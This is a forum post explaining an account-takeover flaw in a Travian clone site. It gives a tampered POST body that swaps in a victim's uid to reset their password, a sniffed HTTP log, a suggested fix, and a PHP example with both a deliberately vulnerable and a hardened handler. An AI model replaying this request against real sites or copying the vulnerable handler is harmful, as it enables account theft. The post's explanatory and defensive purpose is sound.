I think I've understood the exploit xD. Basically, with this program it logs into the account you give it, then moves to the path /spieler.php?s=3 (for those who don't know, that's where you can change password / email / delete the account), then, if you remember, it asks you for the uid + password. Then it sends a POST request to the same path as before (/spieler.php?s=3), but instead of putting the uid of the logged-in account it puts the uid you entered, i.e. of the account whose password you want!!! and of course the victim's new password (pw2 and pw3)!!!!
I tested it manually by modifying the requests and it actually works; a trivial but effective exploit xD. For anyone who didn't understand a thing, here's the HTTP log that came out of the sniffing while the hack was working xD

ft=p3&uid=7&pw1=pwold&pw2=pwnuova&pw3=pwnuova&email_alt=&email_neu=&v1=&del=0&del_pw=&s1.x=0&s1.y=0
GET /login.php HTTP/1.1
Host: solartravian.altervista.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=p0rifibq41mblic3ksmkuq62e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
GET /login.php HTTP/1.1
Host: solartravian.altervista.org
HTTP/1.1 200 OK
Date: Sun, 08 Jul 2012 14:03:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=8q6j1nrsnd3nlkoc838pki5741; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3355
Content-Type: text/html
<form action="" method="post"><input name="pa"><br><input type="submit"></form>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
.<head>
.<title>SolarTravian</title>
<link REL="shortcut icon" HREF="favicon.ico"/>
.<meta name="content-language" content="en" />
.<meta http-equiv="cache-control" content="max-age=0" />
.<meta http-equiv="imagetoolbar" content="no" />
.<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
.<script src="mt-core.js?0faaa" type="text/javascript"></script>
.<script src="mt-more.js?0faaa" type="text/javascript"></script>
.<script src="unx.js?0faaa" type="text/javascript"></script>
.<script src="new.js?0faaa" type="text/javascript"></script>
.<link href="gpack/travian_default/lang/en/compact.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/travian.css?f4b7c" rel="stylesheet" type="text/css" />
.<link href="gpack/travian_default/lang/en/lang.css" rel="stylesheet" type="text/css" />.
</head>
<div class="wrapper">
<div id="dynamic_header">
</div>
<div id="header"></div>
<div id="mid">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<style type="text/css">
div.c1 {text-align: center}
</style>
</head>
<body>
<div id="side_navi">
<a id="logo" href="http://solartravian.altervista.org/" name="logo"><img src="img/x.gif" alt="Travian"></a>
<p><a href="http://solartravian.altervista.org/">Homepage</a> <a href="login.php">Login</a> <a href="anmelden.php">Registrati</a></p>
</div></body>
</html>
<div id="content" class="login">
<h1><img class="img_login" src="img/x.gif" alt="log in the game" /></h1>
<h5><img class="img_u04" src="img/x.gif" alt="login" /></h5>
<p>Devi avere i cookie abilitati per accedere!</p>
<form method="post" name="snd" action="login.php">
<input type="hidden" name="ft" value="a4" />
<table cellpadding="1" cellspacing="1" id="login_form">
.<tbody>
..<tr class="top">
...<th>Nome</th>
...<td><input class="text" type="text" name="user" value="" maxlength="15" autocomplete='off' /> <span class="error"> </span></td>
..</tr>
..<tr class="btm">
...<th>Password</th>
...<td><input class="text" type="password" name="pw" value="" maxlength="20" autocomplete='off' /> <span class="error"></span></td>
...<input type="hidden" name="pa" value="puzzolone">
..</tr>
.</tbody>
</table>
<p class="btn">
.<!--<input type="hidden" name="e1d9d0c" value="" />-->
..<input type="image" value="login" name="s1".onclick="xy();" id="btn_login" class="dynamic_img" src="img/x.gif" alt="login button"./>
</p>
</form>
</div>
<div id="side_info" class="outgame">
...</div>
<div class="clear"></div>
...</div>
...<div class="footer-stopper outgame"></div>
<div class="clear"></div>
<div id="footer">
....<div id="mfoot">
.....<div class="footer-menu">
.........<center><br />
.........<div class="copyright"> Travian files core modded by proux. Origianl copyright goes to Dzoki & Dixie</div>
</div>
.............</div>
.........</div></center>
....<div id="cfoot">
.........</div>
...</div>
..</div><div id="ce"></div>
</body>
</html>
byeZZZ

The fix, for anyone who can code PHP, should come by itself xD: just check that the submitted uid matches the currently logged-in user!!!!!!!
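As an added example (not code from the post or from SolarTravian), the vulnerable shape of the spieler.php?s=3 handler next to a hardened one that takes the account from the session instead of the form. The field names ft/uid/pw1/pw2/pw3 come from the captured POST body; the users table, pw_hash column and $session['uid'] layout are assumptions.

```php
<?php
// Added example, not SolarTravian's code. Assumed schema: users(id, pw_hash);
// assumed session layout: $session['uid'] holds the logged-in account id.
declare(strict_types=1);

// Vulnerable shape (what the post describes): the row to update is chosen by
// the uid the client sent, so any logged-in user can reset any account.
function vulnerable_password_change(PDO $db, array $post): void
{
    $stmt = $db->prepare('UPDATE users SET pw_hash = ? WHERE id = ?');
    $stmt->execute([password_hash((string) $post['pw2'], PASSWORD_DEFAULT), (int) $post['uid']]);
}

// Hardened handler: the account comes from the session, never from the form.
function handle_password_change(PDO $db, array $session, array $post): string
{
    if (empty($session['uid'])) {
        return 'not logged in';
    }
    $uid = (int) $session['uid'];

    // A client uid that differs from the session uid is tampering: refuse
    // instead of silently "correcting" it, so the attempt can be logged.
    if (isset($post['uid']) && (int) $post['uid'] !== $uid) {
        return 'uid mismatch';
    }

    $old = (string) ($post['pw1'] ?? '');
    $new = (string) ($post['pw2'] ?? '');
    if ($new === '' || $new !== (string) ($post['pw3'] ?? '')) {
        return 'new passwords do not match';
    }

    // Re-authenticate with the current password so a hijacked session alone
    // is not enough to lock the real owner out.
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE id = ?');
    $stmt->execute([$uid]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($old, (string) $hash)) {
        return 'old password wrong';
    }

    $stmt = $db->prepare('UPDATE users SET pw_hash = ? WHERE id = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $uid]);
    return 'ok';
}
```

Detection-wise, the 'uid mismatch' branch is the one worth alerting on: a legitimate browser never submits a uid other than its own.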